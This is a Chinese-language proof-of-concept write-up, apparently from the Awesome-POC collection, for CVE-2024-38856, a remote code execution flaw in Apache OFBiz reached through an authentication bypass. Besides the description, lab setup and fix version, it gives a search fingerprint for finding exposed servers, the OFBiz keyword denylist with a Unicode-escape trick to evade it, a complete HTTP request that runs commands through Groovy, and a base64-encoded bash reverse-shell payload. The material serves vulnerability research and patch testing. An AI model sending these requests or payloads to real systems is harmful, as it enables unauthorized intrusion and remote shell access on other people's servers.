mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-04 18:27:48 +00:00
92 lines
3.3 KiB
Markdown
92 lines
3.3 KiB
Markdown
# Apache OFBiz 身份验证绕过导致远程代码执行 CVE-2024-38856
|
||
|
||
## 漏洞描述
|
||
|
||
Apache OFBiz 是一个开源的企业资源规划(ERP)系统。它提供了一套企业应用程序,用于集成和自动化企业的许多业务流程。
|
||
|
||
这个漏洞是由于对 CVE-2023-51467 的不完全修复而产生的。在 Apache OFBiz 18.12.11 版本中,开发人员认为他们已经修复了该漏洞,但实际上他们只解决了其中一种利用方法。Groovy 表达式注入仍然存在,允许未经授权的用户在服务器上执行任意命令。
|
||
|
||
参考链接:
|
||
|
||
- https://github.com/apache/ofbiz-framework/commit/31d8d7
|
||
- https://forum.butian.net/article/524
|
||
- https://github.com/Praison001/CVE-2024-38856-ApacheOfBiz
|
||
- https://issues.apache.org/jira/browse/OFBIZ-13128
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Apache OFBiz < 18.12.14
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
app="Apache_OFBiz"
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
Vulhub 执行如下命令启动一个 Apache OfBiz 18.12.10 服务器:
|
||
|
||
```
|
||
docker compose up -d
|
||
```
|
||
|
||
在等待数分钟后,访问 `https://your-ip:8443/accounting` 查看到登录页面,说明环境已启动成功。
|
||
|
||
如果非本地 localhost 启动,Headers 需要包含 `Host: localhost`,否则报错:
|
||
|
||
```
|
||
ERROR MESSAGE
|
||
org.apache.ofbiz.webapp.control.RequestHandlerException: Domain your-ip not accepted to prevent host header injection.
|
||
```
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
Apache Ofbiz 限制了如下一些关键词的使用,可以通过 Unicode 编码来绕过这个限制,比如 `\u0065xecute`:
|
||
|
||
```
|
||
deniedWebShellTokens=java.,beans,freemarker,<script,javascript,<body,body ,<form,<jsp:,<c:out,taglib,<prefix,<%@ page,<?php,exec(,alert(,\
|
||
%eval,@eval,eval(,runtime,import,passthru,shell_exec,assert,str_rot13,system,decode,include,page ,\
|
||
chmod,mkdir,fopen,fclose,new file,upload,getfilename,download,getoutputstring,readfile,iframe,object,embed,onload,build,\
|
||
python,perl ,/perl,ruby ,/ruby,process,function,class,InputStream,to_server,wget ,static,assign,webappPath,\
|
||
ifconfig,route,crontab,netstat,uname ,hostname,iptables,whoami,"cmd",*cmd|,+cmd|,=cmd|,localhost,thread,require,gzdeflate,\
|
||
execute,println,calc,touch,calculate
|
||
```
|
||
|
||
直接发送如下请求即可使用 Groovy 脚本执行 `id` 命令:
|
||
|
||
```
|
||
POST /webtools/control/main/ProgramExport HTTP/1.1
|
||
Host: localhost:8443
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept: */*
|
||
Accept-Language: en-US;q=0.9,en;q=0.8
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36
|
||
Connection: close
|
||
Cache-Control: max-age=0
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDbR7sY3IIwQX7kcJ
|
||
Content-Length: 190
|
||
|
||
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ
|
||
Content-Disposition: form-data; name="groovyProgram"
|
||
|
||
throw new Exception('id'.\u0065xecute().text);
|
||
------WebKitFormBoundaryDbR7sY3IIwQX7kcJ--
|
||
```
|
||
|
||
|
||
|
||
reverse shell payload:
|
||
|
||
```
|
||
throw new Exception('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'.\u0065xecute().text);
|
||
```
|
||
|
||
## 漏洞修复
|
||
|
||
升级至 18.12.16 及以上版本。
|